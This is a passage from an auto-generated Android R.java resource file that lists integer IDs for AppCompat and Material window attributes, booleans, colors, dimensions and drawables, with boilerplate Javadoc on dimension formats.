(pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int windowFixedWidthMajor=0x7f010065; /** A fixed width for the window along the minor axis of the screen, that is, when in portrait. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int windowFixedWidthMinor=0x7f010067; /** The minimum width the window is allowed to be, along the major axis of the screen. That is, when in landscape. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int windowMinWidthMajor=0x7f010069; /** The minimum width the window is allowed to be, along the minor axis of the screen. That is, when in portrait. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int windowMinWidthMinor=0x7f01006a; /** Flag indicating whether there should be no title on this window. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int windowNoTitle=0x7f010062; } public static final class bool { public static final int abc_action_bar_embed_tabs=0x7f0f0000; public static final int abc_allow_stacked_button_bar=0x7f0f0001; public static final int abc_config_actionMenuItemAllCaps=0x7f0f0002; public static final int mtrl_btn_textappearance_all_caps=0x7f0f0003; } public static final class color { public static final int abc_background_cache_hint_selector_material_dark=0x7f0b0062; public static final int abc_background_cache_hint_selector_material_light=0x7f0b0063; public static final int abc_btn_colored_borderless_text_material=0x7f0b0064; public static final int abc_btn_colored_text_material=0x7f0b0065; public static final int abc_color_highlight_material=0x7f0b0066; public static final int abc_hint_foreground_material_dark=0x7f0b0067; public static final int abc_hint_foreground_material_light=0x7f0b0068; public static final int abc_input_method_navigation_guard=0x7f0b000c; public static final int abc_primary_text_disable_only_material_dark=0x7f0b0069; public static final int abc_primary_text_disable_only_material_light=0x7f0b006a; public static final int abc_primary_text_material_dark=0x7f0b006b; public static final int abc_primary_text_material_light=0x7f0b006c; public static final int abc_search_url_text=0x7f0b006d; public static final int abc_search_url_text_normal=0x7f0b000d; public static final int abc_search_url_text_pressed=0x7f0b000e; public static final int abc_search_url_text_selected=0x7f0b000f; public static final int abc_secondary_text_material_dark=0x7f0b006e; public static final int abc_secondary_text_material_light=0x7f0b006f; public static final int abc_tint_btn_checkable=0x7f0b0070; public static final int abc_tint_default=0x7f0b0071; public static final int abc_tint_edittext=0x7f0b0072; public static final int abc_tint_seek_thumb=0x7f0b0073; public static final int abc_tint_spinner=0x7f0b0074; public static final int abc_tint_switch_track=0x7f0b0075; public static final int accent_material_dark=0x7f0b0010; public static final int accent_material_light=0x7f0b0011; public static final int background_floating_material_dark=0x7f0b0012; public static final int background_floating_material_light=0x7f0b0013; public static final int background_material_dark=0x7f0b0014; public static final int background_material_light=0x7f0b0015; public static final int bright_foreground_disabled_material_dark=0x7f0b0016; public static final int bright_foreground_disabled_material_light=0x7f0b0017; public static final int bright_foreground_inverse_material_dark=0x7f0b0018; public static final int bright_foreground_inverse_material_light=0x7f0b0019; public static final int bright_foreground_material_dark=0x7f0b001a; public static final int bright_foreground_material_light=0x7f0b001b; public static final int browser_actions_bg_grey=0x7f0b005c; public static final int browser_actions_divider_color=0x7f0b005d; public static final int browser_actions_text_color=0x7f0b005e; public static final int browser_actions_title_color=0x7f0b005f; public static final int button_material_dark=0x7f0b001c; public static final int button_material_light=0x7f0b001d; public static final int cardview_dark_background=0x7f0b0008; public static final int cardview_light_background=0x7f0b0009; public static final int cardview_shadow_end_color=0x7f0b000a; public static final int cardview_shadow_start_color=0x7f0b000b; public static final int common_google_signin_btn_text_dark=0x7f0b0076; public static final int common_google_signin_btn_text_dark_default=0x7f0b0000; public static final int common_google_signin_btn_text_dark_disabled=0x7f0b0001; public static final int common_google_signin_btn_text_dark_focused=0x7f0b0002; public static final int common_google_signin_btn_text_dark_pressed=0x7f0b0003; public static final int common_google_signin_btn_text_light=0x7f0b0077; public static final int common_google_signin_btn_text_light_default=0x7f0b0004; public static final int common_google_signin_btn_text_light_disabled=0x7f0b0005; public static final int common_google_signin_btn_text_light_focused=0x7f0b0006; public static final int common_google_signin_btn_text_light_pressed=0x7f0b0007; public static final int common_google_signin_btn_tint=0x7f0b0078; public static final int design_bottom_navigation_shadow_color=0x7f0b0049; public static final int design_default_color_primary=0x7f0b004a; public static final int design_default_color_primary_dark=0x7f0b004b; public static final int design_error=0x7f0b0079; public static final int design_fab_shadow_end_color=0x7f0b004c; public static final int design_fab_shadow_mid_color=0x7f0b004d; public static final int design_fab_shadow_start_color=0x7f0b004e; public static final int design_fab_stroke_end_inner_color=0x7f0b004f; public static final int design_fab_stroke_end_outer_color=0x7f0b0050; public static final int design_fab_stroke_top_inner_color=0x7f0b0051; public static final int design_fab_stroke_top_outer_color=0x7f0b0052; public static final int design_snackbar_background_color=0x7f0b0053; public static final int design_tint_password_toggle=0x7f0b007a; public static final int dim_foreground_disabled_material_dark=0x7f0b001e; public static final int dim_foreground_disabled_material_light=0x7f0b001f; public static final int dim_foreground_material_dark=0x7f0b0020; public static final int dim_foreground_material_light=0x7f0b0021; public static final int error_color_material_dark=0x7f0b0022; public static final int error_color_material_light=0x7f0b0023; public static final int foreground_material_dark=0x7f0b0024; public static final int foreground_material_light=0x7f0b0025; public static final int highlighted_text_material_dark=0x7f0b0026; public static final int highlighted_text_material_light=0x7f0b0027; public static final int material_blue_grey_800=0x7f0b0028; public static final int material_blue_grey_900=0x7f0b0029; public static final int material_blue_grey_950=0x7f0b002a; public static final int material_deep_teal_200=0x7f0b002b; public static final int material_deep_teal_500=0x7f0b002c; public static final int material_grey_100=0x7f0b002d; public static final int material_grey_300=0x7f0b002e; public static final int material_grey_50=0x7f0b002f; public static final int material_grey_600=0x7f0b0030; public static final int material_grey_800=0x7f0b0031; public static final int material_grey_850=0x7f0b0032; public static final int material_grey_900=0x7f0b0033; public static final int mtrl_bottom_nav_colored_item_tint=0x7f0b007b; public static final int mtrl_bottom_nav_item_tint=0x7f0b007c; public static final int mtrl_btn_bg_color_disabled=0x7f0b0054; public static final int mtrl_btn_bg_color_selector=0x7f0b007d; public static final int mtrl_btn_ripple_color=0x7f0b007e; public static final int mtrl_btn_stroke_color_selector=0x7f0b007f; public static final int mtrl_btn_text_btn_ripple_color=0x7f0b0080; public static final int mtrl_btn_text_color_disabled=0x7f0b0055; public static final int mtrl_btn_text_color_selector=0x7f0b0081; public static final int mtrl_btn_transparent_bg_color=0x7f0b0056; public static final int mtrl_chip_background_color=0x7f0b0082; public static final int mtrl_chip_close_icon_tint=0x7f0b0083; public static final int mtrl_chip_ripple_color=0x7f0b0084; public static final int mtrl_chip_text_color=0x7f0b0085; public static final int mtrl_fab_ripple_color=0x7f0b0086; public static final int mtrl_scrim_color=0x7f0b0057; public static final int mtrl_tabs_colored_ripple_color=0x7f0b0087; public static final int mtrl_tabs_icon_color_selector=0x7f0b0088; public static final int mtrl_tabs_icon_color_selector_colored=0x7f0b0089; public static final int mtrl_tabs_legacy_text_color_selector=0x7f0b008a; public static final int mtrl_tabs_ripple_color=0x7f0b008b; public static final int mtrl_text_btn_text_color_selector=0x7f0b008c; public static final int mtrl_textinput_default_box_stroke_color=0x7f0b0058; public static final int mtrl_textinput_disabled_color=0x7f0b0059; public static final int mtrl_textinput_filled_box_default_background_color=0x7f0b005a; public static final int mtrl_textinput_hovered_box_stroke_color=0x7f0b005b; public static final int notification_action_color_filter=0x7f0b0060; public static final int notification_icon_bg_color=0x7f0b0061; public static final int notification_material_background_media_default_color=0x7f0b0048; public static final int primary_dark_material_dark=0x7f0b0034; public static final int primary_dark_material_light=0x7f0b0035; public static final int primary_material_dark=0x7f0b0036; public static final int primary_material_light=0x7f0b0037; public static final int primary_text_default_material_dark=0x7f0b0038; public static final int primary_text_default_material_light=0x7f0b0039; public static final int primary_text_disabled_material_dark=0x7f0b003a; public static final int primary_text_disabled_material_light=0x7f0b003b; public static final int ripple_material_dark=0x7f0b003c; public static final int ripple_material_light=0x7f0b003d; public static final int secondary_text_default_material_dark=0x7f0b003e; public static final int secondary_text_default_material_light=0x7f0b003f; public static final int secondary_text_disabled_material_dark=0x7f0b0040; public static final int secondary_text_disabled_material_light=0x7f0b0041; public static final int switch_thumb_disabled_material_dark=0x7f0b0042; public static final int switch_thumb_disabled_material_light=0x7f0b0043; public static final int switch_thumb_material_dark=0x7f0b008d; public static final int switch_thumb_material_light=0x7f0b008e; public static final int switch_thumb_normal_material_dark=0x7f0b0044; public static final int switch_thumb_normal_material_light=0x7f0b0045; public static final int tooltip_background_dark=0x7f0b0046; public static final int tooltip_background_light=0x7f0b0047; } public static final class dimen { public static final int abc_action_bar_content_inset_material=0x7f0c001a; public static final int abc_action_bar_content_inset_with_nav=0x7f0c001b; public static final int abc_action_bar_default_height_material=0x7f0c0010; public static final int abc_action_bar_default_padding_end_material=0x7f0c001c; public static final int abc_action_bar_default_padding_start_material=0x7f0c001d; public static final int abc_action_bar_elevation_material=0x7f0c001f; public static final int abc_action_bar_icon_vertical_padding_material=0x7f0c0020; public static final int abc_action_bar_overflow_padding_end_material=0x7f0c0021; public static final int abc_action_bar_overflow_padding_start_material=0x7f0c0022; public static final int abc_action_bar_stacked_max_height=0x7f0c0023; public static final int abc_action_bar_stacked_tab_max_width=0x7f0c0024; public static final int abc_action_bar_subtitle_bottom_margin_material=0x7f0c0025; public static final int abc_action_bar_subtitle_top_margin_material=0x7f0c0026; public static final int abc_action_button_min_height_material=0x7f0c0027; public static final int abc_action_button_min_width_material=0x7f0c0028; public static final int abc_action_button_min_width_overflow_material=0x7f0c0029; public static final int abc_alert_dialog_button_bar_height=0x7f0c000f; public static final int abc_alert_dialog_button_dimen=0x7f0c002a; public static final int abc_button_inset_horizontal_material=0x7f0c002b; public static final int abc_button_inset_vertical_material=0x7f0c002c; public static final int abc_button_padding_horizontal_material=0x7f0c002d; public static final int abc_button_padding_vertical_material=0x7f0c002e; public static final int abc_cascading_menus_min_smallest_width=0x7f0c002f; public static final int abc_config_prefDialogWidth=0x7f0c0013; public static final int abc_control_corner_material=0x7f0c0030; public static final int abc_control_inset_material=0x7f0c0031; public static final int abc_control_padding_material=0x7f0c0032; public static final int abc_dialog_corner_radius_material=0x7f0c0033; public static final int abc_dialog_fixed_height_major=0x7f0c0014; public static final int abc_dialog_fixed_height_minor=0x7f0c0015; public static final int abc_dialog_fixed_width_major=0x7f0c0016; public static final int abc_dialog_fixed_width_minor=0x7f0c0017; public static final int abc_dialog_list_padding_bottom_no_buttons=0x7f0c0034; public static final int abc_dialog_list_padding_top_no_title=0x7f0c0035; public static final int abc_dialog_min_width_major=0x7f0c0018; public static final int abc_dialog_min_width_minor=0x7f0c0019; public static final int abc_dialog_padding_material=0x7f0c0036; public static final int abc_dialog_padding_top_material=0x7f0c0037; public static final int abc_dialog_title_divider_material=0x7f0c0038; public static final int abc_disabled_alpha_material_dark=0x7f0c0039; public static final int abc_disabled_alpha_material_light=0x7f0c003a; public static final int abc_dropdownitem_icon_width=0x7f0c003b; public static final int abc_dropdownitem_text_padding_left=0x7f0c003c; public static final int abc_dropdownitem_text_padding_right=0x7f0c003d; public static final int abc_edit_text_inset_bottom_material=0x7f0c003e; public static final int abc_edit_text_inset_horizontal_material=0x7f0c003f; public static final int abc_edit_text_inset_top_material=0x7f0c0040; public static final int abc_floating_window_z=0x7f0c0041; public static final int abc_list_item_padding_horizontal_material=0x7f0c0042; public static final int abc_panel_menu_list_width=0x7f0c0043; public static final int abc_progress_bar_height_material=0x7f0c0044; public static final int abc_search_view_preferred_height=0x7f0c0045; public static final int abc_search_view_preferred_width=0x7f0c0046; public static final int abc_seekbar_track_background_height_material=0x7f0c0047; public static final int abc_seekbar_track_progress_height_material=0x7f0c0048; public static final int abc_select_dialog_padding_start_material=0x7f0c0049; public static final int abc_switch_padding=0x7f0c001e; public static final int abc_text_size_body_1_material=0x7f0c004a; public static final int abc_text_size_body_2_material=0x7f0c004b; public static final int abc_text_size_button_material=0x7f0c004c; public static final int abc_text_size_caption_material=0x7f0c004d; public static final int abc_text_size_display_1_material=0x7f0c004e; public static final int abc_text_size_display_2_material=0x7f0c004f; public static final int abc_text_size_display_3_material=0x7f0c0050; public static final int abc_text_size_display_4_material=0x7f0c0051; public static final int abc_text_size_headline_material=0x7f0c0052; public static final int abc_text_size_large_material=0x7f0c0053; public static final int abc_text_size_medium_material=0x7f0c0054; public static final int abc_text_size_menu_header_material=0x7f0c0055; public static final int abc_text_size_menu_material=0x7f0c0056; public static final int abc_text_size_small_material=0x7f0c0057; public static final int abc_text_size_subhead_material=0x7f0c0058; public static final int abc_text_size_subtitle_material_toolbar=0x7f0c0011; public static final int abc_text_size_title_material=0x7f0c0059; public static final int abc_text_size_title_material_toolbar=0x7f0c0012; public static final int browser_actions_context_menu_max_width=0x7f0c00cb; public static final int browser_actions_context_menu_min_padding=0x7f0c00cc; public static final int cardview_compat_inset_shadow=0x7f0c000c; public static final int cardview_default_elevation=0x7f0c000d; public static final int cardview_default_radius=0x7f0c000e; public static final int compat_button_inset_horizontal_material=0x7f0c00d1; public static final int compat_button_inset_vertical_material=0x7f0c00d2; public static final int compat_button_padding_horizontal_material=0x7f0c00d3; public static final int compat_button_padding_vertical_material=0x7f0c00d4; public static final int compat_control_corner_material=0x7f0c00d5; public static final int compat_notification_large_icon_max_height=0x7f0c00d6; public static final int compat_notification_large_icon_max_width=0x7f0c00d7; public static final int design_appbar_elevation=0x7f0c0077; public static final int design_bottom_navigation_active_item_max_width=0x7f0c0078; public static final int design_bottom_navigation_active_item_min_width=0x7f0c0079; public static final int design_bottom_navigation_active_text_size=0x7f0c007a; public static final int design_bottom_navigation_elevation=0x7f0c007b; public static final int design_bottom_navigation_height=0x7f0c007c; public static final int design_bottom_navigation_icon_size=0x7f0c007d; public static final int design_bottom_navigation_item_max_width=0x7f0c007e; public static final int design_bottom_navigation_item_min_width=0x7f0c007f; public static final int design_bottom_navigation_margin=0x7f0c0080; public static final int design_bottom_navigation_shadow_height=0x7f0c0081; public static final int design_bottom_navigation_text_size=0x7f0c0082; public static final int design_bottom_sheet_modal_elevation=0x7f0c0083; public static final int design_bottom_sheet_peek_height_min=0x7f0c0084; public static final int design_fab_border_width=0x7f0c0085; public static final int design_fab_elevation=0x7f0c0086; public static final int design_fab_image_size=0x7f0c0087; public static final int design_fab_size_mini=0x7f0c0088; public static final int design_fab_size_normal=0x7f0c0089; public static final int design_fab_translation_z_hovered_focused=0x7f0c008a; public static final int design_fab_translation_z_pressed=0x7f0c008b; public static final int design_navigation_elevation=0x7f0c008c; public static final int design_navigation_icon_padding=0x7f0c008d; public static final int design_navigation_icon_size=0x7f0c008e; public static final int design_navigation_item_horizontal_padding=0x7f0c008f; public static final int design_navigation_item_icon_padding=0x7f0c0090; public static final int design_navigation_max_width=0x7f0c006f; public static final int design_navigation_padding_bottom=0x7f0c0091; public static final int design_navigation_separator_vertical_padding=0x7f0c0092; public static final int design_snackbar_action_inline_max_width=0x7f0c0070; public static final int design_snackbar_background_corner_radius=0x7f0c0071; public static final int design_snackbar_elevation=0x7f0c0093; public static final int design_snackbar_extra_spacing_horizontal=0x7f0c0072; public static final int design_snackbar_max_width=0x7f0c0073; public static final int design_snackbar_min_width=0x7f0c0074; public static final int design_snackbar_padding_horizontal=0x7f0c0094; public static final int design_snackbar_padding_vertical=0x7f0c0095; public static final int design_snackbar_padding_vertical_2lines=0x7f0c0075; public static final int design_snackbar_text_size=0x7f0c0096; public static final int design_tab_max_width=0x7f0c0097; public static final int design_tab_scrollable_min_width=0x7f0c0076; public static final int design_tab_text_size=0x7f0c0098; public static final int design_tab_text_size_2line=0x7f0c0099; public static final int design_textinput_caption_translate_y=0x7f0c009a; public static final int disabled_alpha_material_dark=0x7f0c005a; public static final int disabled_alpha_material_light=0x7f0c005b; public static final int fastscroll_default_thickness=0x7f0c0000; public static final int fastscroll_margin=0x7f0c0001; public static final int fastscroll_minimum_range=0x7f0c0002; public static final int highlight_alpha_material_colored=0x7f0c005c; public static final int highlight_alpha_material_dark=0x7f0c005d; public static final int highlight_alpha_material_light=0x7f0c005e; public static final int hint_alpha_material_dark=0x7f0c005f; public static final int hint_alpha_material_light=0x7f0c0060; public static final int hint_pressed_alpha_material_dark=0x7f0c0061; public static final int hint_pressed_alpha_material_light=0x7f0c0062; public static final int item_touch_helper_max_drag_scroll_per_frame=0x7f0c0003; public static final int item_touch_helper_swipe_escape_max_velocity=0x7f0c0004; public static final int item_touch_helper_swipe_escape_velocity=0x7f0c0005; public static final int mr_controller_volume_group_list_item_height=0x7f0c0006; public static final int mr_controller_volume_group_list_item_icon_size=0x7f0c0007; public static final int mr_controller_volume_group_list_max_height=0x7f0c0008; public static final int mr_controller_volume_group_list_padding_top=0x7f0c000b; public static final int mr_dialog_fixed_width_major=0x7f0c0009; public static final int mr_dialog_fixed_width_minor=0x7f0c000a; public static final int mtrl_bottomappbar_fabOffsetEndMode=0x7f0c009b; public static final int mtrl_bottomappbar_fab_cradle_margin=0x7f0c009c; public static final int mtrl_bottomappbar_fab_cradle_rounded_corner_radius=0x7f0c009d; public static final int mtrl_bottomappbar_fab_cradle_vertical_offset=0x7f0c009e; public static final int mtrl_bottomappbar_height=0x7f0c009f; public static final int mtrl_btn_corner_radius=0x7f0c00a0; public static final int mtrl_btn_dialog_btn_min_width=0x7f0c00a1; public static final int mtrl_btn_disabled_elevation=0x7f0c00a2; public static final int mtrl_btn_disabled_z=0x7f0c00a3; public static final int mtrl_btn_elevation=0x7f0c00a4; public static final int mtrl_btn_focused_z=0x7f0c00a5; public static final int mtrl_btn_hovered_z=0x7f0c00a6; public static final int mtrl_btn_icon_btn_padding_left=0x7f0c00a7; public static final int mtrl_btn_icon_padding=0x7f0c00a8; public static final int mtrl_btn_inset=0x7f0c00a9; public static final int mtrl_btn_letter_spacing=0x7f0c00aa; public static final int mtrl_btn_padding_bottom=0x7f0c00ab; public static final int mtrl_btn_padding_left=0x7f0c00ac; public static final int mtrl_btn_padding_right=0x7f0c00ad; public static final int mtrl_btn_padding_top=0x7f0c00ae; public static final int mtrl_btn_pressed_z=0x7f0c00af; public static final int mtrl_btn_stroke_size=0x7f0c00b0; public static final int mtrl_btn_text_btn_icon_padding=0x7f0c00b1; public static final int mtrl_btn_text_btn_padding_left=0x7f0c00b2; public static final int mtrl_btn_text_btn_padding_right=0x7f0c00b3; public static final int mtrl_btn_text_size=0x7f0c00b4; public static final int mtrl_btn_z=0x7f0c00b5; public static final int mtrl_card_elevation=0x7f0c00b6; public static final int mtrl_card_spacing=0x7f0c00b7; public static final int mtrl_chip_pressed_translation_z=0x7f0c00b8; public static final int mtrl_chip_text_size=0x7f0c00b9; public static final int mtrl_fab_elevation=0x7f0c00ba; public static final int mtrl_fab_translation_z_hovered_focused=0x7f0c00bb; public static final int mtrl_fab_translation_z_pressed=0x7f0c00bc; public static final int mtrl_navigation_elevation=0x7f0c00bd; public static final int mtrl_navigation_item_horizontal_padding=0x7f0c00be; public static final int mtrl_navigation_item_icon_padding=0x7f0c00bf; public static final int mtrl_snackbar_background_corner_radius=0x7f0c00c0; public static final int mtrl_snackbar_margin=0x7f0c00c1; public static final int mtrl_textinput_box_bottom_offset=0x7f0c00c2; public static final int mtrl_textinput_box_corner_radius_medium=0x7f0c00c3; public static final int mtrl_textinput_box_corner_radius_small=0x7f0c00c4; public static final int mtrl_textinput_box_label_cutout_padding=0x7f0c00c5; public static final int mtrl_textinput_box_padding_end=0x7f0c00c6; public static final int mtrl_textinput_box_stroke_width_default=0x7f0c00c7; public static final int mtrl_textinput_box_stroke_width_focused=0x7f0c00c8; public static final int mtrl_textinput_outline_box_expanded_padding=0x7f0c00c9; public static final int mtrl_toolbar_default_height=0x7f0c00ca; public static final int notification_action_icon_size=0x7f0c00d8; public static final int notification_action_text_size=0x7f0c00d9; public static final int notification_big_circle_margin=0x7f0c00da; public static final int notification_content_margin_start=0x7f0c00ce; public static final int notification_large_icon_height=0x7f0c00db; public static final int notification_large_icon_width=0x7f0c00dc; public static final int notification_main_column_padding_top=0x7f0c00cf; public static final int notification_media_narrow_margin=0x7f0c00d0; public static final int notification_right_icon_size=0x7f0c00dd; public static final int notification_right_side_padding_top=0x7f0c00cd; public static final int notification_small_icon_background_padding=0x7f0c00de; public static final int notification_small_icon_size_as_large=0x7f0c00df; public static final int notification_subtext_size=0x7f0c00e0; public static final int notification_top_pad=0x7f0c00e1; public static final int notification_top_pad_large_text=0x7f0c00e2; public static final int subtitle_corner_radius=0x7f0c006b; public static final int subtitle_outline_width=0x7f0c006c; public static final int subtitle_shadow_offset=0x7f0c006d; public static final int subtitle_shadow_radius=0x7f0c006e; public static final int tooltip_corner_radius=0x7f0c0063; public static final int tooltip_horizontal_padding=0x7f0c0064; public static final int tooltip_margin=0x7f0c0065; public static final int tooltip_precise_anchor_extra_offset=0x7f0c0066; public static final int tooltip_precise_anchor_threshold=0x7f0c0067; public static final int tooltip_vertical_padding=0x7f0c0068; public static final int tooltip_y_offset_non_touch=0x7f0c0069; public static final int tooltip_y_offset_touch=0x7f0c006a; } public static final class drawable { public static final int abc_ab_share_pack_mtrl_alpha=0x7f020000; public static final int abc_action_bar_item_background_material=0x7f020001; public static final int abc_btn_borderless_material=0x7f020002; public static final int abc_btn_check_material=0x7f020003; public static final int abc_btn_check_to_on_mtrl_000=0x7f020004; public static final int abc_btn_check_to_on_mtrl_015=0x7f020005; public static final int abc_btn_colored_material=0x7f020006; public static final int abc_btn_default_mtrl_shape=0x7f020007; public static final int abc_btn_radio_material=0x7f020008; public static final int abc_btn_radio_to_on_mtrl_000=0x7f020009; public static final int abc_btn_radio_to_on_mtrl_015=0x7f02000a; public static final int abc_btn_switch_to_on_mtrl_00001=0x7f02000b; public static final int abc_btn_switch_to_on_mtrl_00012=0x7f02000c; public static final int abc_cab_background_internal_bg=0x7f02000d; public static final int abc_cab_background_top_material=0x7f02000e; public static final int abc_cab_background_top_mtrl_alpha=0x7f02000f; public static final int abc_control_background_material=0x7f020010; public static final int abc_dialog_material_background=0x7f020011; public static final int abc_edit_text_material=0x7f020012; public static final int abc_ic_ab_back_material=0x7f020013; public static final int abc_ic_arrow_drop_right_black_24dp=0x7f020014; public static final int abc_ic_clear_material=0x7f020015; public static final int abc_ic_commit_search_api_mtrl_alpha=0x7f020016; public static final int abc_ic_go_search_api_material=0x7f020017; public static final int abc_ic_menu_copy_mtrl_am_alpha=0x7f020018; public static final int abc_ic_menu_cut_mtrl_alpha=0x7f020019; public static final int abc_ic_menu_overflow_material=0x7f02001a; public static final int abc_ic_menu_paste_mtrl_am_alpha=0x7f02001b; public static final int abc_ic_menu_selectall_mtrl_alpha=0x7f02001c; public static final int abc_ic_menu_share_mtrl_alpha=0x7f02001d; public static final int abc_ic_search_api_material=0x7f02001e; public static final int abc_ic_star_black_16dp=0x7f02001f; public static final int abc_ic_star_black_36dp=0x7f020020; public static final int abc_ic_star_black_48dp=0x7f020021; public static final int abc_ic_star_half_black_16dp=0x7f020022; public static final int abc_ic_star_half_black_36dp=0x7f020023; public static final int abc_ic_star_half_black_48dp=0x7f020024; public static final int abc_ic_voice_search_api_material=0x7f020025; public static final int abc_item_background_holo_dark=0x7f020026; public static final int abc_item_background_holo_light=0x7f020027; public static final int abc_list_divider_material=0x7f020028; public static final int abc_list_divider_mtrl_alpha=0x7f020029; public static final int abc_list_focused_holo=0x7f02002a; public static final int abc_list_longpressed_holo=0x7f02002b; public static final int abc_list_pressed_holo_dark=0x7f02002c; public static final int abc_list_pressed_holo_light=0x7f02002d; public static final int abc_list_selector_background_transition_holo_dark=0x7f02002e; public static final int abc_list_selector_background_transition_holo_light=0x7f02002f; public static final int abc_list_selector_disabled_holo_dark=0x7f020030; public static final int abc_list_selector_disabled_holo_light=0x7f020031; public static final int abc_list_selector_holo_dark=0x7f020032; public static final int abc_list_selector_holo_light=0x7f020033; public static final int abc_menu_hardkey_panel_mtrl_mult=0x7f020034; public static final int abc_popup_background_mtrl_mult=0x7f020035; public static final int abc_ratingbar_indicator_material=0x7f020036; public static final int abc_ratingbar_material=0x7f020037; public static final int abc_ratingbar_small_material=0x7f020038; public static final int abc_scrubber_control_off_mtrl_alpha=0x7f020039; public static final int abc_scrubber_control_to_pressed_mtrl_000=0x7f02003a; public static final int abc_scrubber_control_to_pressed_mtrl_005=0x7f02003b; public static final int abc_scrubber_primary_mtrl_alpha=0x7f02003c; public static final int abc_scrubber_track_mtrl_alpha=0x7f02003d; public static final int abc_seekbar_thumb_material=0x7f02003e; public static final int abc_seekbar_tick_mark_material=0x7f02003f; public static final int abc_seekbar_track_material=0x7f020040; public static final int abc_spinner_mtrl_am_alpha=0x7f020041; public static final int abc_spinner_textfield_background_material=0x7f020042; public static final int abc_switch_thumb_material=0x7f020043; public static final int abc_switch_track_mtrl_alpha=0x7f020044; public static final int abc_tab_indicator_material=0x7f020045; public static final int abc_tab_indicator_mtrl_alpha=0x7f020046; public static final int abc_text_cursor_material=0x7f020047; public static final int abc_text_select_handle_left_mtrl_dark=0x7f020048; public static final int abc_text_select_handle_left_mtrl_light=0x7f020049; public static final int abc_text_select_handle_middle_mtrl_dark=0x7f02004a; public static final int abc_text_select_handle_middle_mtrl_light=0x7f02004b; public static final int abc_text_select_handle_right_mtrl_dark=0x7f02004c; public static final int abc_text_select_handle_right_mtrl_light=0x7f02004d; public static final int abc_textfield_activated_mtrl_alpha=0x7f02004e; public static final int abc_textfield_default_mtrl_alpha=0x7f02004f; public static final int abc_textfield_search_activated_mtrl_alpha=0x7f020050; public static final int abc_textfield_search_default_mtrl_alpha=0x7f020051; public static final int abc_textfield_search_material=0x7f020052; public static final int abc_vector_test=0x7f020053; public static final int avd_hide_password=0x7f020054; public static final int avd_hide_password_1=0x7f02014a; public static final int avd_hide_password_2=0x7f02014b; public static final int avd_hide_password_3=0x7f02014c; public static final int avd_show_password=0x7f020055; public static final int avd_show_password_1=0x7f02014d; public static final int avd_show_password_2=0x7f02014e; public static final int avd_show_password_3=0x7f02014f; public static final int common_full_open_on_phone=0x7f020056; public static final int common_google_signin_btn_icon_dark=0x7f020057; public static final int common_google_signin_btn_icon_dark_focused=0x7f020058; public static final int common_google_signin_btn_icon_dark_normal=0x7f020059; public static final int common_google_signin_btn_icon_dark_normal_background=0x7f02005a; public static final int common_google_signin_btn_icon_disabled=0x7f02005b; public static final int common_google_signin_btn_icon_light=0x7f02005c; public static final int common_google_signin_btn_icon_light_focused=0x7f02005d; public static final int common_google_signin_btn_icon_light_normal=0x7f02005e; public static final int common_google_signin_btn_icon_light_normal_background=0x7f02005f; public static final int common_google_signin_btn_text_dark=0x7f020060; public static final int common_google_signin_btn_text_dark_focused=0x7f020061; public static final int common_google_signin_btn_text_dark_normal=0x7f020062; public static final int common_google_signin_btn_text_dark_normal_background=0x7f020063; public static final int common_google_signin_btn_text_disabled=0x7f020064; public static final int common_google_signin_btn_text_light=0x7f020065; public static final int common_google_signin_btn_text_light_focused=0x7f020066; public static final int common_google_signin_btn_text_light_normal=0x7f020067; public static final int common_google_signin_btn_text_light_normal_background=0x7f020068; public static final int design_bottom_navigation_item_background=0x7f020069; public static final int design_fab_background=0x7f02006a; public static final int design_ic_visibility=0x7f02006b; public static final int design_ic_visibility_off=0x7f02006c; public static final int design_password_eye=0x7f02006d; public static final int design_snackbar_background=0x7f02006e; public static final int googleg_disabled_color_18=0x7f02006f; public static final int googleg_standard_color_18=0x7f020070; public static final int ic_audiotrack_dark=0x7f020071; public static final int ic_audiotrack_light=0x7f020072; public static final int ic_dialog_close_dark=0x7f020073; public static final int ic_dialog_close_light=0x7f020074; public static final int ic_group_collapse_00=0x7f020075; public static final int ic_group_collapse_01=0x7f020076; public static final int ic_group_collapse_02=0x7f020077; public static final int ic_group_collapse_03=0x7f020078; public static final int 